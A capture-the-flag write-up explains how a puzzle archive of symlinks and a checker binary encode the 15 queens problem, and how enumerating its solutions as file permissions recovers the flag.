The hint given in the challenge description spoils what chall.tar is completely, so much so that I am surprised this challenge didn't have many more solutions after the hint was released. We can gain a similar understanding of chall.tar from how the check executable works and the general structure of the archive.

Using IDA Pro we can find that check does roughly the following:

  • sets up inotify watchers on all regular (non-symlink) files in each of the 225 directories
  • try to fopen each of the 225 regular files in read/write mode, then fclose
  • set result to 0
  • handle all triggered inotify events:
    • increment result by 1
    • for each IN_CLOSE_WRITE event (i.e. file closed after write access), try to execve all the symlinks in the just-closed file's directory
  • exit with exit code result

Note that execve will only succeed when the file referenced by the symlink can be executed; if execve succeeds, the program will crash, because there are no valid executables in the chall.tar directory (each regular file is only 1 byte long).

In other words, check counts the regular files it can open whose "neighbours" (i.e. files referenced by the symlink it that file's directory) are not executable.

One more extremely important hint: the number of directories in chall.tar is 225, which is 15 * 15, a perfect square. VAL is also 15.

We can also count how many files there are in each of the 225 directories. If we simply extract the archive and go through the directories in alphabetical order, the result is rather chaotic. However, the directories are contained in chall.tar in a particular order. We can see this with:

$ tar -tvf chall.tar
drwxr-xr-x  0 notifico notifico    0 Dec 22 14:06 chall/
drwxr-xr-x  0 notifico notifico    0 Dec 22 14:06 chall/NrTOYjZgBjJHfNLu/
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/NrTOYjZgBjJHfNLu/clxAKWStzqRKyxql -> ../eAvSLhONEWpXqnwu/JHFulfjgaQGnmOPx
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/NrTOYjZgBjJHfNLu/OfTFUEFIyGMZMoan -> ../HdWkyeWugdUHdzuU/rUXgDUpTytwSoWon
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/NrTOYjZgBjJHfNLu/drwKLoWvVcjNdMiX -> ../zoPhogrElBntiQUN/ThQhbYJgbiSZbykb
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/NrTOYjZgBjJHfNLu/zvXOjUgOepbQeCoe -> ../ISOYfrwvVOMZveHE/jroOyZVjiUCJCHgf
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/fXWIMMRZvMSweIId/GIlMJUgUbXbYmdSE -> ../pNuhEkCjuZfTZWvi/JFhCuAbdlsMRpcNo
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/fXWIMMRZvMSweIId/KdDQXPXYBqQARKQc -> ../QdyTwLeNTUDvXTFI/DJLuDDWviVrYegVM
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/fXWIMMRZvMSweIId/MCOiuhLUCuCoPZvn -> ../vruPGIPvYbkWqNzX/MHinNnRcKtLLeEXV
lrwxrwxrwx  0 notifico notifico    0 Dec 22 14:06 chall/fXWIMMRZvMSweIId/ufIYqBqbfCgGIspR -> ../vqPxvKvBQGHntyiv/aYPWRwJUyOyHRILd
-r--------  0 notifico notifico    1 Dec 22 14:06 chall/fXWIMMRZvMSweIId/KYtdUumqvnfClEMF

If we count the symlinks in the directories in this order and arrange them in a 15 * 15 square, we get a very neat result:

42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42
42,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  42
42,  44,  46,  46,  46,  46,  46,  46,  46,  46,  46,  46,  46,  44,  42
42,  44,  46,  48,  48,  48,  48,  48,  48,  48,  48,  48,  46,  44,  42
42,  44,  46,  48,  50,  50,  50,  50,  50,  50,  50,  48,  46,  44,  42
42,  44,  46,  48,  50,  52,  52,  52,  52,  52,  50,  48,  46,  44,  42
42,  44,  46,  48,  50,  52,  54,  54,  54,  52,  50,  48,  46,  44,  42
42,  44,  46,  48,  50,  52,  54,  56,  54,  52,  50,  48,  46,  44,  42
42,  44,  46,  48,  50,  52,  54,  54,  54,  52,  50,  48,  46,  44,  42
42,  44,  46,  48,  50,  52,  52,  52,  52,  52,  50,  48,  46,  44,  42
42,  44,  46,  48,  50,  50,  50,  50,  50,  50,  50,  48,  46,  44,  42
42,  44,  46,  48,  48,  48,  48,  48,  48,  48,  48,  48,  46,  44,  42
42,  44,  46,  46,  46,  46,  46,  46,  46,  46,  46,  46,  46,  44,  42
42,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  44,  42
42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42,  42

It is symmetric and there are more symlinks in the "central" directories.

Maybe you can see where all of this (+ the explicit hint) is leading to. Chess! More specifically, a chess puzzle, the N queens problem. The famous eight queens puzzle is a chess puzzle where the goal is to arrange 8 queens on a regular (8 * 8) chessboard without any of them being able to see one another (queens can move and see horizontally, vertically, and diagonally). In this case we have a 15 queens puzzle.

Consider for example the top-left directory in the table above. It has 42 symlinks:

Q,   X,   X,   X,   X,   X,   X,   X,   X,   X,   X,   X,   X,   X,   X
X,   X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .
X,   .,   X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .
X,   .,   .,   X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .
X,   .,   .,   .,   X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .
X,   .,   .,   .,   .,   X,   .,   .,   .,   .,   .,   .,   .,   .,   .
X,   .,   .,   .,   .,   .,   X,   .,   .,   .,   .,   .,   .,   .,   .
X,   .,   .,   .,   .,   .,   .,   X,   .,   .,   .,   .,   .,   .,   .
X,   .,   .,   .,   .,   .,   .,   .,   X,   .,   .,   .,   .,   .,   .
X,   .,   .,   .,   .,   .,   .,   .,   .,   X,   .,   .,   .,   .,   .
X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   X,   .,   .,   .,   .
X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   X,   .,   .,   .
X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   X,   .,   .
X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   X,   .
X,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   .,   X

Count the squares that the queen (Q) can see (X) and there are 42 of them. In fact, each of those X's in the actual chall.tar is a symlink to that particular directory.

Unfortunately, there are thousands of solutions to the 15 queens problem. Fortunately, we can generate them systematically with a script and hence decrypt the flag. Once again, we can adapt a program from Rosetta Code.

Adapted C program here

We let this C program generate all the solutions to the problem and have a Python script change each solution to a list of UNIX permissions in the order the original script used (it sorted the directories alphabetically), SHA-256 hash it, and try to decrypt the flag.

Python decoder here

(As per the challenge description, each "queen" would be marked by a regular file with 700 permissions, each non-queen would remain at 400 permissions, as provided in the chall.tar template.)
